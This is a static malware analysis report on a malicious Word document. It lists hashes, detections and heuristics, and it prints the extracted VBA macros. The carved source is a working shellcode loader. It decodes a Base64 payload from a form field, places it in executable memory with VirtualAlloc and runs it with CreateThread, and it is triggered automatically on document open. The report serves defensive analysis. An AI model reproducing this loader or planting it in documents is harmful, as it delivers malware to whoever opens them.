Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a640b836bcf3b9ff…

MALICIOUS

Office (OLE)

Size: 46.5 KB
Created: 2017-07-09 01:32:00
Authoring application: Microsoft Office Word
First seen: 2017-12-08
MD5: e95668ed9cf8ee7c16de81cc9a50b4ba
SHA-1: a84e86fe2d0657cba9462338957b32400977d819
SHA-256: a640b836bcf3b9ff6a6e096c23d69a0db0cfb7572713930aa716c8ccba16a4d6
Risk score: 146

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros, including an AutoOpen macro, which are commonly used to download and execute malicious payloads. The presence of the VirtualAlloc API reference suggests memory manipulation for payload execution. While no specific download URL was extracted, the macro's presence and the ClamAV detection strongly indicate downloader functionality.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
    Sub AutoOpen()
            RunFlat
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
            RunFlat
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    ' TODO: move "auto-open" functions into different module
    Sub Auto_Open()
            RunFlat
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL (channel in which it was found)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    • http://www.eclipse.org/legal  In document text (OLE body)
    • http://www.gnu.org/licenses/lgpl.html  In document text (OLE body)
    • http://www.gnu.org/licenses/gpl.html  In document text (OLE body)
    • http://www.gnu.org/licenses/agpl.html  In document text (OLE body)
    • http://www.apache.org/licenses  In document text (OLE body)
    • http://www.opensource.org/licenses/bsd-license.php  In document text (OLE body)
    • http://www.opensource.org/licenses/MIT  In document text (OLE body)
    • http://www.eclipse.org/legal  In document text (OLE body)
    • http://www.opensource.org/licenses/MIT  In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8551 bytes
SHA-256: ca3c7a7b183534eda86a88c5bc40c663d344e31fed77f124a7f567493f63aa48
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
' A Base64 Encoder/Decoder.
'
' This module is used to encode and decode data in Base64 format as described in RFC 1521.
'
' Home page: www.source-code.biz.
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland.
'
' This module is multi-licensed and may be used under the terms
' of any of the following licenses:
'
'  EPL, Eclipse Public License, V1.0 or later, http://www.eclipse.org/legal
'  LGPL, GNU Lesser General Public License, V2.1 or later, http://www.gnu.org/licenses/lgpl.html
'  GPL, GNU General Public License, V2 or later, http://www.gnu.org/licenses/gpl.html
'  AGPL, GNU Affero General Public License V3 or later, http://www.gnu.org/licenses/agpl.html
'  AL, Apache License, V2.0 or later, http://www.apache.org/licenses
'  BSD, BSD License, http://www.opensource.org/licenses/bsd-license.php
'  MIT, MIT License, http://www.opensource.org/licenses/MIT
'
' Please contact the author if you need another license.
' This module is provided "as is", without warranties of any kind.

Option Explicit

Private InitDone       As Boolean
Private Map1(0 To 63)  As Byte
Private Map2(0 To 127) As Byte

' Encodes a string into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   S         a String to be encoded.
' Returns:    a String with the Base64 encoded data.
Public Function Base64EncodeString(ByVal s As String) As String
   Base64EncodeString = Base64Encode(ConvertStringToBytes(s))
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode(InData() As Byte)
   Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
'   InLen     number of bytes to process in InData.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String
   If Not InitDone Then Init
   If InLen = 0 Then Base64Encode2 = "": Exit Function
   Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3     ' output length without padding
   Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4           ' output length including padding
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip0 As Long: ip0 = LBound(InData)
   Dim ip As Long
   Dim op As Long
   Do While ip < InLen
      Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1
      Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0
      Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0
      Dim o0 As Byte: o0 = i0 \ 4
      Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10)
      Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40)
      Dim o3 As Byte: o3 = i2 And &H3F
      Out(op) = Map1(o0): op = op + 1
      Out(op) = Map1(o1): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1
      Loop
   Base64Encode2 = ConvertBytesToString(Out)
   End Function

' Decodes a string from Base64 format.
' Parameters:
'    s        a Base64 String to be decoded.
' Returns     a String containing the decoded data.
Public Function Base64DecodeString(ByVal s As String) As String
   If s = "" Then Base64DecodeString = "": Exit Function
   Base64DecodeString = ConvertBytesToString(Base64Decode(s))
   End Function

' Decodes a byte array from Base64 format.
' Parameters
'   s         a Base64 String to be decoded.
' Returns:    an array containing the decoded data bytes.
Public Function Base64Decode(ByVal s As String) As Byte()
   If Not InitDone Then Init
   Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
   Dim ILen As Long: ILen = UBound(IBuf) + 1
   If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
   Do While ILen > 0
      If IBuf(ILen - 1) <> Asc("=") Then Exit Do
      ILen = ILen - 1
      Loop
   Dim OLen As Long: OLen = (ILen * 3) \ 4
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip As Long
   Dim op As Long
   Do While ip < ILen
      Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
      Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
      Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
      Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
      If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim b0 As Byte: b0 = Map2(i0)
      Dim b1 As Byte: b1 = Map2(i1)
      Dim b2 As Byte: b2 = Map2(i2)
      Dim b3 As Byte: b3 = Map2(i3)
      If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
      Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
      Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
      Out(op) = o0: op = op + 1
      If op < OLen Then Out(op) = o1: op = op + 1
      If op < OLen Then Out(op) = o2: op = op + 1
      Loop
   Base64Decode = Out
   End Function

Private Sub Init()
   Dim c As Integer, i As Integer
   ' set Map1
   i = 0
   For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
   Map1(i) = Asc("+"): i = i + 1
   Map1(i) = Asc("/"): i = i + 1
   ' set Map2
   For i = 0 To 127: Map2(i) = 255: Next
   For i = 0 To 63: Map2(Map1(i)) = i: Next
   InitDone = True
   End Sub

Private Function ConvertStringToBytes(ByVal s As String) As Byte()
   Dim b1() As Byte: b1 = s
   Dim l As Long: l = (UBound(b1) + 1) \ 2
   If l = 0 Then ConvertStringToBytes = b1: Exit Function
   Dim b2() As Byte
   ReDim b2(0 To l - 1) As Byte
   Dim p As Long
   For p = 0 To l - 1
      Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
      If c >= 256 Then c = Asc("?")
      b2(p) = c
      Next
   ConvertStringToBytes = b2
   End Function

Private Function ConvertBytesToString(b() As Byte) As String
   Dim l As Long: l = UBound(b) - LBound(b) + 1
   Dim b2() As Byte
   ReDim b2(0 To (2 * l) - 1) As Byte
   Dim p0 As Long: p0 = LBound(b)
   Dim p As Long
   For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
   Dim s As String: s = b2
   ConvertBytesToString = s
   End Function


Attribute VB_Name = "Module1"
Private Declare Function VirtualAlloc Lib "kernel32" _
        (ByVal BaseAddr As Long, ByVal Size As Long, _
        ByVal flags1 As Long, ByVal flags2 As Long) As Long

Private Declare Sub CreateThread Lib "kernel32" _
        (ByVal Zopqv As Long, ByVal Xhxi As Long, _
        ByVal proc As Long, ByVal param As Long, _
        ByVal Zukax As Long, Rlere As Long)

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" _
         (ByVal lpDest As Long, ByRef lpSource As Byte, ByVal cbCopy As Long)

' NB. must be global in order for CreateThread to pass parameter correctly
Dim avvm_stack_bottom As Long

Sub RunFlat()
#If Win64 Then
        Exit Sub
#End If
        Dim src_data() As Byte, data_size As Long
        src_data = Base64Decode(UserForm1.TextBox1.Text)
        data_size = UBound(src_data) - LBound(src_data) + 1
        
        Dim target_mem As Long
        target_mem = VirtualAlloc(0, data_size, &H1000, &H40)
        CopyMemory target_mem, src_data(0), data_size
        
        avvm_stack_bottom = target_mem + data_size
        CreateThread 0, 0, target_mem, avvm_stack_bottom, 0, 0
End Sub


' TODO: move "auto-open" functions into different module
Sub Auto_Open()
        RunFlat
End Sub
Sub AutoOpen()
        RunFlat
End Sub
Sub Workbook_Open()
        RunFlat
End Sub